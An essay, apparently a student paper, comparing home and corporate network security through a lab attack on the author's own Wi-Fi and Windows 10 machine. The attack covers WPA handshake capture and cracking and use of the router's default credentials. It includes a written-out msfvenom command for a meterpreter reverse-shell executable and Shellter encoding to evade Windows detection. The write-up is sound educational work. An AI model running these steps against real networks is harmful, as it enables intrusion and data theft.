Technology is an integrated part of society in nearly every aspect of life these days, and this leads to information processed and stored by technology being commonplace. This leads to the issue of how that information is secured. Oftentimes, people believe that their information on their home network is secure, however, they do not do much to protect their home network as they figure that no one would try to hack their home network since they are just one person. However, how much of a potential risk is having an insecure home network when there are so many companies out there with vulnerable networks as well?
A lot of times people forget that they have an abundance of personal information stored on their home networks as well as what they have given away to companies, and by forgetting this, they do not realize just how important it is to keep their home network secure as well. This is a big issue as it means that their home networks are often left vulnerable to attack. I believe that I will find that home wireless networks often are much less secure than corporate networks, yet can provide just as much important and personal data as a corporate network can for a hacker.
Two main concepts need to be grasped to fully understand how important network security is. The first concept is the different security tools and techniques used in both environments, and the second concept is how a corporate network differs from a home network. In a lot of ways, these two concepts merge into each other since corporate networks vary a lot from home/personal networks by the tools that they use and the systems that they have implemented. Some of the important tools that need to be understood are a firewall, an intrusion prevention system (IPS), a modem/router, and databases. These devices may sound complex but are fairly simple once broken down. A firewall is a device or software that is put onto a network to help make sure that only authorized users can access the network. It does this by blocking and allowing only certain software on a device and only certain devices from accessing the network, based on pre-defined rules.
An IPS is a system that is commonly used in corporate networks that does exactly what the name implies. An IPS prevents intrusion from outside threats into a network by searching for commonly used methods of hacking into a network and blocking them when they are found. These are often expensive and not used on a home network.
Although technically a modem and a router are different devices, they are often combined into one these days and so I will explain them as one for the sake of simplicity and refer to it from here on out as a combo router. A combo router uses the modem section of it to receive the internet connection from the Internet Service Provider (ISP – i.e., Comcast, AT&T, HughesNet, Starlink, etc.), decode the connection, and give your home (or an organization) an internet connection. The router part of a combo router takes the internet connection that the modem receives and makes it usable via an ethernet cable or a Wi-Fi connection that is created. Together, the router and modem in a combo router provide you with a Wi-Fi connection.
Databases are another common software that is used by organizations. Databases are used to store information about customers, their phone numbers, email addresses, home addresses, credit card numbers, etc. There is an abundance of different databases that can be used to store this information, and they can all be protected differently based on how they are set up. The important thing to know about databases is that they are used to store sensitive information about customers a lot of times.
To prove just how much of an issue having an insecure home network is, I set up a network that I owned and hacked into it. The following demonstration is for educational purposes only to show the problems that come with having an insecure home network.
First, I set up a home network the way that most home networks are configured. This consisted of a Combo Router that was configured (these configuration steps are specific to your Internet Service Provider [ISP]) to run a wireless network that I named “Nighthawk” with one of the most common passwords in the United States being used as the password: “Password1”.
1. Then, I connected a new device to that network (in this case, it was a spare machine that was running the Windows 10 Operating System [OS]).
2. To test the strength of the Wi-Fi network’s security, I used a computer running the Kali Linux OS.
3. Using Airmon-ng, I put my computer into promiscuous mode.
4. After the network card was put into promiscuous mode, I used the command “sudo airodump-ng wlan0mon” to see the information about the network I created.
5. Using the information I gathered about the “Nighthawk” network, I listened to what devices were on the network and saved that information into a file for use later once the handshake was captured.
6. While that was running, I opened another new terminal tab and used the aireplay tool to send de-authentication packets to the devices on my network that I had connected to it, causing those devices to temporarily disconnect and then reconnect to the network.
7. Once that was completed successfully, the devices reconnected to the network instantly and provided me with the 3-Way handshake that I needed.
8. Since that 3-Way handshake was recorded in the “handshake.cap” file that I specified a couple of commands ago, I then used the Aircrack tool to crack the password stored in that handshake from the file by testing that file against a common wordlist of passwords (that comes pre-loaded onto Kali as well), known as “rockyou.txt”. This started running the software and, almost immediately, cracked the password in less than one second.
9. I then opened a terminal, reset my Wi-Fi card, and connected to the “Nighthawk” Wi-Fi network using the password I cracked.
10. Now that I was connected to the Wi-Fi network I hacked into, I immediately tested to see if the network administrator console was secure or not. I did this by finding the default route for the IP address under system settings.
11. After I found that IP address, I typed it into my web browser and was given a login prompt. I needed to know what type of router was being used however, so I ran the netdiscover command to discover what devices were connected to the network that I was now connected to. To do this, I opened a new terminal window and ran the command: “sudo netdiscover -i wlan0”. This uses a built-in tool that finds all devices connected to the same Wi-Fi network you are on and lets you know their IP addresses and vendors.
12. I saw that there was a device from Netgear that had the same IP address as the router. So, I did a quick search on the internet for default credentials for Netgear router admin consoles and was greeted on my first search with some results.
13. I tried the username “admin” and the password “password” and, sure enough, they worked, and I was let into the admin console for the router.
14. From there, I browsed through the different settings and had full access to change anything and do anything to the Wi-Fi network that I wanted, including changing the network’s name and password to whatever I wanted.
15. For the sake of the test, I did not change anything. However, I now had that ability. Instead, I turned my attention back to the other device that I saw was on the network from my “netdiscover” scan. This device (which I knew was my machine with Windows 10 on it) could have data that would be valuable to me (or in the real world, a malicious hacker), so I copied the IP address of that device.
16. After that was copied, I scanned for what ports were open on the IP address I found using the command: “sudo nmap -sV -sC –O -Pn 192.168.1.3”. This scanned the top 1000 ports to let me know if any of them were open and let me know what OS the computer was running.
17. The results of the Nmap scan came back with no open ports and a message saying there were too many potential OSs the machine could be running, so it was unsure about the OS.
18. I was not able to see that the computer was running Windows 10 from the Nmap scan, but it was a fair guess, as most home computers run Windows 10 at this point. If it was something else (such as MacOS), it would show a different wireless card manufacturer for those types of machines. So, from there I opened software called msfvenom (pre-loaded onto Kali Linux), used for writing a lot of exploit scripts. I did this by opening a new terminal and typing “msfvenom -p windows/meterpreter/reverse_tcp -a x86 –platform windows -f exe LHOST=192.168.1.6 LPORT=4444 -o coolfile.exe”.
19. After having that file created, I began using a program known as “Shellter” that encodes the payload to make it virtually unrecognizable as malicious by Windows.
20. After following the prompts from the Shellter software, I had a malicious payload that was nearly undetectable by Windows.
*** NOTE: There are many ways to do the following steps and to transfer the file to the remote machine. I opted for a flash drive which would require some form of social engineering to get the device owner to plug it into their machine. Though there are many other methods that I could have used that would have been remote, I did not have a machine that was old enough to use a more-vulnerable or unpatched version of Windows, and using an actual exploit for Windows 10 would have taken me a much larger amount of time to do so I opted to transfer the file via a USB thumb drive for testing purposes. ***
21. Then, I copied the file that was created from the previous commands onto a USB thumb drive and copied it to my Windows 10 machine from the thumb drive.
22. On my Kali machine, I then started a program that is called Metasploit (which is also freely available and comes pre-loaded onto Kali).
23. From there, I proceeded to navigate to the listener module that I wanted to use, specified that I wanted it to listen for my msfvenom script’s connection, and told it to listen on my IP address before typing “run” and hitting enter. This started the listener.
24. I then copied the malicious file over to the desktop of the Windows 10 computer (though this is not necessary for the exploit to run) and then double-clicked on the file, which ran the script I put into the file in the background (making it look like nothing happened on the Windows machine).
25. Immediately on my Kali machine, the listener recognized the connection and gave me a meterpreter shell (a special shell that is created by Metasploit) with full access to all the files on the computer, including the photos, the documents, and everything else, exposing a whole bunch of sensitive information.
26. I was able to then type “shell” to get a local shell that used Windows’ CMD commands.
27. After I had that shell, all that I had to do was browse through the computer’s directories and see if I could find any valuable information. In this case, I was able to browse to the user’s “Documents” folder and find a file called “Super Secret Passwords.txt”. I opened the file and was greeted with (simulated) bank account information.
*** NOTE: Though the way that the document is stored in the above example and the ease of access to this file may seem unreasonable, it is not uncommon for people to store all of their passwords in a document that is just saved to their desktop or local computer without a password even set on the document. However, in the end, this is just a test scenario as well. ***
The results of the testing were as expected, and I was able to hack into the Wi-Fi network and the Windows 10 machine with minimal effort, whereas a hacker who was attempting to hack into a corporate network would have taken a much longer time and have hit a tremendous number of roadblocks if they had done the same thing as was done for a home network. There were pretty much no challenges that come along with hacking into the home network and the test was highly effective and proved my initial hypothesis to be true.
Corporate networks are commonly incredibly complex with multiple levels of routing and switching that happen in between them, but also are secured by much more complex levels of security than a home network is. These levels of protection are commonly (at minimum) comprised of a firewall, an IDS/IPS, and a database. Because of this, pretty much every enterprise-level network setup would easily have detected (and likely have stopped) the attack that I used on the home network within minutes or even seconds. An IPS would have detected and prevented my de-authentication requests I sent to the network to try to get the WPA handshake that allowed me to grab the Wi-Fi password key and crack it. An enterprise-grade firewall would have easily detected my reverse shell (through most methods with which I would have gotten it onto the target computer as well as the actual connection itself) and have blocked it from ever reaching back out to my machine. The sensitive information that I showed an example of at the end of the process would have been stored inside a database that (almost certainly) would have stored the data in an encrypted format that would have been unreadable to me without a key to decrypt it. All these devices would have rendered virtually any and every part of my basic home network hack useless and I likely would have gotten caught and arrested if I had attempted this on a corporate network.
Though it is true that not every corporate network is set up this securely and that at times there may be loopholes, exceptions, and modifications to this above analysis, the same could be said for home networks that are well-defended as well. At the most basic level, this setup holds true in at least most of it at a corporate level and proves that it would be much easier for a malicious hacker to steal data from a home Wi-Fi network than it would be for them to steal that same data from an enterprise network.
Though there are benefits that a malicious hacker would receive from compromising this same data on an enterprise network (such as that they would also receive a tremendous amount more personal data than just a few people’s personal data, such as from the home network), the risk is often one that seems to outweigh the reward for a malicious hacker. The low-hanging fruit of an insecure home network would still provide the malicious hacker with a (depending on the home network and victim’s data) decent amount of information or monetary value that could be used in many ways for their own gain. This is why it is so vital for home networks to be secured properly and for those who own the networks to have knowledge of how to protect their networks.